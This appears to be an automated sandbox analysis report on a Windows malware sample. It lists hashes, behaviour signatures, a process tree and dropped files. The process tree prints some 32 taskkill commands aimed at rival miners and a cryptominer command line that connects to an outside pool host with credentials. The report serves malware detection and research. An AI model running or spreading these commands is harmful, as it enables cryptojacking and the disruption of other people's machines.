Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2024 12:34

General

  • Target

    c5e3045463eec98fb592703d17d764ab.exe

  • Size

    414KB

  • MD5

    c5e3045463eec98fb592703d17d764ab

  • SHA1

    f833057e667bb46c9c5760706ff93ef3becfa16f

  • SHA256

    e1522348b9a344636d8e3b22a41fec6d78e938ed118a5f4204ffad4ba87536b6

  • SHA512

    82372f593276c9017eab00db39b207d03e42dd49a5a46f70d94700ae797c903264dc06c5962b60c2201efb64f37c24fd306506da0aef041b03c7556c68ef1725

  • SSDEEP

    12288:IkWAehJuqT6zxyJr9Cw6g0Q+kSDEPhdIJ9WmDjylJ69V:IkWAAuqezIhwPTQq7J9WWjEk9V

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5e3045463eec98fb592703d17d764ab.exe
    "C:\Users\Admin\AppData\Local\Temp\c5e3045463eec98fb592703d17d764ab.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:976
    • C:\Users\Admin\Start Menu\Programs\Startup\newmoon17.exe
      "C:\Users\Admin\Start Menu\Programs\Startup\newmoon17.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Users\Admin\AppData\Roaming\kakao3\new.exe
        "C:\Users\Admin\AppData\Roaming\kakao3\new.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CMD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM x30811.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1712
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM cgminer.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svchoost.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2860
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije2.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4424
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije3.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM yaaa3.2.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4108
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM WinMine.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije4.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1212
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije5.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4056
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM mamatije6.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2456
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM taker.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1700
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM install-1.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3044
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM install-0.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4500
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM tasker.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4952
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM start.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4544
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM start0.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4828
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM hahahahaha.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM wuT.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2252
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM wuT2.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3284
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM wuT3.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM wuT4.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2704
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM NoRisk.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4372
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM NoRisk2.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:880
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM gagajeje.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3088
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM marica.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2344
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM hmm3.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2200
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM hula.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3064
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM official27.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2460
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ev0ga.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3932
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM fuckHDZSDP.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3364
        • C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exe
          fuckHDZSDP.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:5608
          • C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exe
            fuckHDZSDP.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:5832
            • C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exe
              mine.exe -a 59 -o http://hdzx.aquarium-stakany.org:8332/ -u darkSons_crypt -p pt
              6⤵
              • Executes dropped EXE
              PID:5880

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newmoon17.exe

    Filesize

    359KB

    MD5

    1ce65c3c14f7f09c08c50fbb6a8c1cc4

    SHA1

    46e4fd565736ff96a94f5b762c1f875c32585a1b

    SHA256

    4d588c0d12120e17bb7ab0505f546f9ef1144bce7fabb7e1dda98b2b7a0d78db

    SHA512

    735d13e914c9242add4f07aa0fb2da1e605f335f9cd5f94eb2ceb280ba723fc11074c9cef0d4824fb1cda60e4c806507689e5626b4fb0aae9e8fe0f4dcb557d5

  • C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exe

    Filesize

    272KB

    MD5

    ae9c07d9b2ea9c1f58e32d3c44b0f33e

    SHA1

    e1e72ae01919bc8f0bd236aa00eed4d029c7cce7

    SHA256

    cf1372ef80717e2458c97b778e5121e7b8f590004dec90581947e6afb6ec8cb2

    SHA512

    6de04c9d8e057de2da54bbb5f518f5534d30a7bdcf40af93808ae4f31f5b3e1d748764e87af064a18e0734e1d2ef1b153bd267dfa85b6b872e653b5206b3368a

  • C:\Users\Admin\AppData\Roaming\kakao3\new.exe

    Filesize

    56KB

    MD5

    c31027010355fd8f52fe3640048acd37

    SHA1

    5dd50d63d76b8e1cefbc019cfd414c57fffeaa72

    SHA256

    82bd6f72c10c1c492c019ec1528c5737e08d112aa63bf0ab57dead223d7f9286

    SHA512

    56a74030e2d3f61cd3b2675ecf366dd005830723bbb3ff46cea3dd7f283f0791f5782ba29d2d0bb8d3778e1cdebb3c96da5269f9d5b64febbf659ec65a8b609e

  • memory/5608-23-0x0000000000520000-0x0000000000528000-memory.dmp

    Filesize

    32KB

  • memory/5608-24-0x0000000000520000-0x0000000000528000-memory.dmp

    Filesize

    32KB

  • memory/5832-69-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-65-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-30-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-73-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-71-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-48-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-67-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-28-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-63-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-61-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-59-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-57-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-55-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-52-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5832-25-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/5880-50-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-39-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-46-0x00000000006D0000-0x000000000071B000-memory.dmp

    Filesize

    300KB

  • memory/5880-49-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-45-0x0000000000770000-0x0000000000775000-memory.dmp

    Filesize

    20KB

  • memory/5880-51-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-44-0x00000000022F0000-0x00000000022F2000-memory.dmp

    Filesize

    8KB

  • memory/5880-53-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-54-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-42-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-56-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-41-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-58-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-40-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-60-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-47-0x00000000005D0000-0x00000000005D1000-memory.dmp

    Filesize

    4KB

  • memory/5880-62-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-37-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-64-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-36-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-66-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-35-0x00000000004FD000-0x0000000000537000-memory.dmp

    Filesize

    232KB

  • memory/5880-68-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-34-0x00000000004FD000-0x0000000000537000-memory.dmp

    Filesize

    232KB

  • memory/5880-70-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-33-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-72-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB

  • memory/5880-31-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/5880-74-0x0000000000400000-0x00000000005368DA-memory.dmp

    Filesize

    1.2MB